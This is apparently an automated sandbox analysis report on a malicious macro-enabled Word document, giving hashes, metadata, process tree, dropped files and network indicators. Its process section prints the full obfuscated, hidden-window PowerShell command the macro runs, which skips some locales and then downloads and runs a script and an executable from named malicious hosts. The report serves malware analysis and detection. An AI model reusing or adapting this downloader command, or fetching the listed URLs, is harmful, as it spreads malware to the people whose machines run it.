File name: 675030.docm
Full analysis: https://app.any.run/tasks/99259107-4158-47e5-a04d-c92436925eba
Verdict: Malicious activity
Analysis date: June 19, 2019, 08:59:43
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, macros-on-open, maldoc-1, maldoc-4
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5: 42EFF1C19D5941BF5F2D7ECFB6D7A3C5
SHA1: A0968131ABF0ABDE51F5B70385BABE6E58B6C44D
SHA256: 6354D6716654177EBF8F705971EEE33E37280734EB2F3F3D0A9CDBAB95AB22BB
SSDEEP: 1536:q1bryaP+7C3hskRSSuclIyTPHkDD+WZbQ8NGVp3:q1bOasIRSSuclIyoDDI6G3

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Unusual execution from Microsoft Office
      • WINWORD.EXE (PID: 584)
    • Executes PowerShell scripts
      • WINWORD.EXE (PID: 584)
  • SUSPICIOUS
    • Creates files in the user directory
      • powershell.exe (PID: 2136)
  • INFO
    • Reads Microsoft Office registry keys
      • WINWORD.EXE (PID: 584)
    • Creates files in the user directory
      • WINWORD.EXE (PID: 584)
No Malware configuration.

TRiD

.docm | Word Microsoft Office Open XML Format document (with Macro) (53.6)
.docx | Word Microsoft Office Open XML Format document (24.2)
.zip | Open Packaging Conventions container (18)
.zip | ZIP compressed archive (4.1)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0006
ZipCompression: Deflated
ZipModifyDate: 1980:01:01 00:00:00
ZipCRC: 0x2a6675f6
ZipCompressedSize: 445
ZipUncompressedSize: 1900
ZipFileName: [Content_Types].xml

XMP

Title: -
Subject: -
Creator: VPS2day
Description: -

XML

Keywords: -
LastModifiedBy: VPS2day
RevisionNumber: 31
CreateDate: 2019:03:27 00:11:00Z
ModifyDate: 2019:03:28 02:13:00Z
Template: Normal.dotm
TotalEditTime: 1.8 hours
Pages: 1
Words: -
Characters: 3
Application: Microsoft Office Word
DocSecurity: None
Lines: 1
Paragraphs: 1
ScaleCrop: No
HeadingPairs: Title, 1
TitlesOfParts: -
Company: VPS2day
LinksUpToDate: No
CharactersWithSpaces: 3
SharedDoc: No
HyperlinksChanged: No
AppVersion: 16
No data.
Total processes: 36
Monitored processes: 2
Malicious processes: 1
Suspicious processes: 0

Behavior graph

start -> winword.exe -> powershell.exe

Process information

PID: 584
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\675030.docm"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000

PID: 2136
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command if( (Get-UICulture).Name -match 'RU|UA|BY|CN'){ exit; };$ccbwfbe = [System.IO.Path]::GetTempPath();$zgwdu = Join-Path $ccbwfbe 'Dke.exe';$ztudg='http://cloud.chachobills.com/501?jdihwj';$cigch = Join-Path $ccbwfbe 'SearchI32.js';$bejtsfe='http://ami.regroups.net/loadercrypt_823EF8A810513A4071485C36DDAD4CC3.php?vid=pecdoc';$bxeziu='(N68RRtCyew-Object 68RRtCyNet68RRtCy.WebC68RRtCylie68RRtCynt).D68RRtCyown68RRtCyload68RRtCyF68RRtCyile($bej68RRtCytsf68RRtCye,$c68RRtCyigch)68RRtCy;' -replace '68RRtCy','';iex $bxeziu;Start-Process $cigch;$zsbevy='(NRR2vERtew-Object RR2vERtNRR2vERteRR2vERtt.WebClieRR2vERtntRR2vERt).DowRR2vERtnloadFiRR2vERtlRR2vERte($zRR2vERttuRR2vERtdgRR2vERt,$RR2vERtzgRR2vERtwRR2vERtdu);' -replace 'RR2vERt','';iex $zsbevy;Start-Process $zgwdu;
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: WINWORD.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Total events: 1 428
Read events: 749
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 0
Suspicious files: 2
Text files: 2
Unknown types: 4

Dropped files

PID: 584 | Process: WINWORD.EXE | Filename: C:\Users\admin\AppData\Local\Temp\CVR11FA.tmp.cvr | Type: -
MD5: - | SHA256: -

PID: 2136 | Process: powershell.exe | Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LERXRYOZKIP05LHNX21Y.temp | Type: -
MD5: - | SHA256: -

PID: 2136 | Process: powershell.exe | Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF121e3e.TMP | Type: binary
MD5: 16D0FD6E07266B2C15A9D7BC6623F506 | SHA256: 833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B

PID: 584 | Process: WINWORD.EXE | Filename: C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\675030.docm.LNK | Type: lnk
MD5: BE28F451D3407C85F716D753DEB3D8FC | SHA256: C99E025DC75F6FC4950B317EB5698E8E2743F2CC0FCB5B3AB7B85E7CD8CE0C76

PID: 584 | Process: WINWORD.EXE | Filename: C:\Users\admin\Desktop\~$675030.docm | Type: pgc
MD5: 8017E57F7F74B4972588D1A99AEA6749 | SHA256: 087E2AAE9B27B115352326952079908B86A23DAB2CDC56CE794EFEC2CDEDB07B

PID: 584 | Process: WINWORD.EXE | Filename: C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | Type: pgc
MD5: D177531F4B3098B3B691EDAA702892BC | SHA256: 8E0DB2A1DB745D99DE193E8A55F1FD719D67DFF6B94C239636EFD8D97611CDC8

PID: 2136 | Process: powershell.exe | Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | Type: binary
MD5: 16D0FD6E07266B2C15A9D7BC6623F506 | SHA256: 833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B

PID: 584 | Process: WINWORD.EXE | Filename: C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | Type: text
MD5: 3D0124F59D52F9207C85F0C63A6B1FDF | SHA256: 9C808B2D68CDE0D511B2C8FFEAC874305BDB7470EE7C4D237773EB5DC661982D
HTTP(S) requests: 1
TCP/UDP connections: 1
DNS requests: 1
Threats: 0

HTTP requests

PID: 2136
Process: powershell.exe
Method: GET
HTTP Code: -
IP: 185.158.250.114:80
URL: http://ami.regroups.net/loadercrypt_823EF8A810513A4071485C36DDAD4CC3.php?vid=pecdoc
CN: NL
Type: -
Size: -
Reputation: malicious

Connections

PID: 2136
Process: powershell.exe
IP: 185.158.250.114:80
Domain: ami.regroups.net
ASN: M247 Ltd
CN: NL
Reputation: malicious

DNS requests

Domain: ami.regroups.net
IP: 185.158.250.114
Reputation: malicious

Threats

No threats detected
No debug info